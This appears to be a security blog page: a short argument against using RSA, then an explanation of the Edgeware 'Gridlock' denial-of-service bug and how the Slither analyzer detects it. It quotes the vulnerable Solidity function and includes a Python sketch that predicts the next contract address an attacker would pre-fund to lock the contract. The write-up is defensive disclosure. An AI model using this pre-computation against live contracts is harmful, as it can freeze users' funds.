
RSA was an important milestone in the development of secure communications, but the last two decades of cryptographic research have rendered it obsolete. Elliptic curve algorithms for both key exchange and digital signatures were standardized back in 2005 and have since been integrated into intuitive and misuse-resistant libraries like libsodium. The fact that RSA is still in widespread use today indicates a failure both on the part of cryptographers, who have not adequately articulated the risks inherent in RSA, and on the part of developers, who overestimate their ability to deploy it successfully.

The security community needs to start thinking about this as a herd-immunity problem: while some of us might be able to navigate the extraordinarily dangerous process of setting up or implementing RSA, the exceptions signal to developers that it is in some way still advisable to use RSA. Despite the many caveats and warnings on StackExchange and GitHub READMEs, very few people believe that they are the ones who will mess up RSA, and so they proceed with reckless abandon. Ultimately, users will pay for this. This is why we all need to agree that it is flat-out unacceptable to use RSA in 2019. No exceptions.

Avoiding Smart Contract “Gridlock” with Slither

A denial-of-service (DoS) vulnerability, dubbed ‘Gridlock,’ was publicly reported on July 1st in one of Edgeware’s smart contracts deployed on Ethereum. As much as $900 million worth of Ether may have been processed by this contract. Edgeware has since acknowledged and fixed the “fatal bug.”

When we heard about Gridlock, we ran Slither on the vulnerable and fixed Edgeware contracts. Its publicly available dangerous-strict-equality detector correctly identifies the dangerous assertion in the vulnerable contract, and shows the absence of this vulnerability in the fixed contract.

This blog post details why this vulnerability is so subtle, the implementation details behind Slither’s dangerous-strict-equality detector that identified this vulnerability, and how Slither can help prevent developers from introducing such vulnerabilities in the future.

Strict Equality and DoS Vulnerability

The Gridlock vulnerability was identified in the snippet below. Upon discovery, the bug was acknowledged by the maintainers and a second version addressing the issue was deployed.

    /**
     * @dev        Locks up the value sent to contract in a new Lock
     * @param      term         The length of the lock up
     * @param      edgewareAddr The bytes representation of the target edgeware key
     * @param      isValidator  Indicates if sender wishes to be a validator
     */
    function lock(Term term, bytes calldata edgewareAddr, bool isValidator)
        external
        payable
        didStart
        didNotEnd
    {
        uint256 eth = msg.value;
        address owner = msg.sender;
        uint256 unlockTime = unlockTimeForTerm(term);
        // Create ETH lock contract
        Lock lockAddr = (new Lock).value(eth)(owner, unlockTime);
        // ensure lock contract has all ETH, or fail
        assert(address(lockAddr).balance == msg.value); // BUG
        emit Locked(owner, eth, lockAddr, term, edgewareAddr, isValidator, now);
    }

Specifically, the source of this vulnerability is the assertion which performs a strict equality check between the balance of the newly created Lock contract and the msg.value sent to this contract.

From the contract developer’s perspective, this assertion should hold: the new Lock contract was created on the previous line and credited with an Ether value equal to the msg.value sent as part of the current transaction.

However, this assumes that the newly created Lock contract address holds zero Ether before its creation. That assumption is incorrect: Ether can be sent to a contract address before any contract is instantiated there. This is possible because Ethereum contract addresses are computed deterministically from the creator’s address and nonce, so they can be predicted in advance.

The DoS attack consists of pre-calculating the next Lock contract address and sending some Wei to that address. This forces the lock() function to fail at the assertion in all future transactions, bringing the contract to a “Gridlock.”
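
Here is a sketch of the attacker’s pre-computation step in Python, assuming the rlp and eth_utils packages; the deployer address and nonce below are made up for illustration. A contract created with CREATE lives at the last 20 bytes of keccak256(rlp([creator_address, creator_nonce])), so anyone who knows the Lockdrop contract’s address and its current nonce can fund the next Lock address before it exists.

import rlp
from eth_utils import keccak, to_canonical_address, to_checksum_address

def next_create_address(deployer, nonce):
    """Address of the next contract the deployer will create via CREATE."""
    raw = keccak(rlp.encode([to_canonical_address(deployer), nonce]))[12:]
    return to_checksum_address(raw)

# Hypothetical Lockdrop deployment: send a few wei here, and every future
# call to lock() fails its balance assertion.
lockdrop_address = "0x" + "ab" * 20  # placeholder, not the real contract
print(next_create_address(lockdrop_address, nonce=3))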

The fix is to replace the assertion with the one below, where strict equality (‘==’) is replaced by ‘>=’ to account for any Ether already present at the address of the newly created Lock contract.

assert(address(lockAddr).balance >= msg.value);

Avoiding strict equality when determining whether an account has enough Ether or tokens is a well-understood defensive programming technique in Solidity.

Slither’s Dangerous-Strict-Equality Detector

Slither has had a publicly available dangerous-strict-equality detector targeting this type of vulnerability since version 0.5.0, released on January 14th, 2019. We classify results from this detector as Medium impact and High confidence: strict equality on Ether or token balances is nearly always a mistake, and it usually appears in logic fundamental to the operation of the contract. The results of this check are worth reviewing closely!

Running Slither on the Lockdrop.sol contract immediately identifies the vulnerable assertion:

$ slither --detect incorrect-equality Lockdrop.sol 
INFO:Detectors:
Lockdrop.lock(Lockdrop.Term,bytes,bool) (Lockdrop.sol#53-67) uses a dangerous strict equality:
        - assert(bool)(address(lockAddr).balance == msg.value)
Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#dangerous-strict-equalities
INFO:Slither:Lockdrop.sol analyzed (2 contracts), 1 result(s) found

This detector is implemented using a lightweight taint analysis, where the taint sources are program constructs involving msg.value, now, block.number, block.timestamp, and the results of ERC token balanceOf() calls. The taint sinks are expressions using strict equality comparisons, i.e., ‘==’. The analysis works on Slither’s intermediate language representation, SlithIR, and tracks the propagation of tainted values across assignments and function calls. An alert is generated when a taint sink has a data dependency on a taint source.
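
As a rough sketch (not Slither’s internal implementation), the same idea can be expressed with Slither’s public Python API, assuming solc is available and that is_dependent, Binary, and BinaryType are imported as documented; this version only flags ‘==’ comparisons that depend on msg.value.

from slither import Slither
from slither.analyses.data_dependency.data_dependency import is_dependent
from slither.core.declarations.solidity_variables import SolidityVariableComposed
from slither.slithir.operations import Binary, BinaryType

slither = Slither("Lockdrop.sol")
msg_value = SolidityVariableComposed("msg.value")

for contract in slither.contracts:
    for function in contract.functions:
        for node in function.nodes:
            for ir in node.irs:
                # Sink: a strict equality in SlithIR; source: msg.value
                if isinstance(ir, Binary) and ir.type == BinaryType.EQUAL:
                    if any(is_dependent(v, msg_value, contract) for v in ir.read):
                        print(f"dangerous strict equality in {function.name}: {node.expression}")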

A simple textual search might have caught this particular vulnerability, but syntactic regular expressions tend to either raise a fog of false alerts or miss instances entirely, because this vulnerability pattern can manifest in many ways, including across function calls and variable assignments. Hardcoding such a regular expression is challenging. Other security tools either lack a detector for this vulnerability or produce a substantial number of false positives. The lightweight semantic taint analysis enabled by SlithIR greatly improves this detector’s accuracy and reduces false positives.

In the case of the Lockdrop contract, Slither’s dangerous-strict-equality detector generates such an alert because msg.value and an address balance are used in a strict equality comparison within an assertion. This is a textbook example of a strict equality vulnerability which is caught effortlessly by Slither. We also verified that this alert is not present in the recently fixed code.

Crytic.io correctly identifies “Gridlock” in the Edgeware smart contracts

Besides this detector, Slither has 35 more that catch many Solidity smart contract vulnerabilities. They work together with 30 additional proprietary detectors in crytic.io, our continuous assurance system (think “Travis-CI but for Ethereum”). So, go ahead and give Slither a shot. We would love to hear about your experience, and welcome feedback.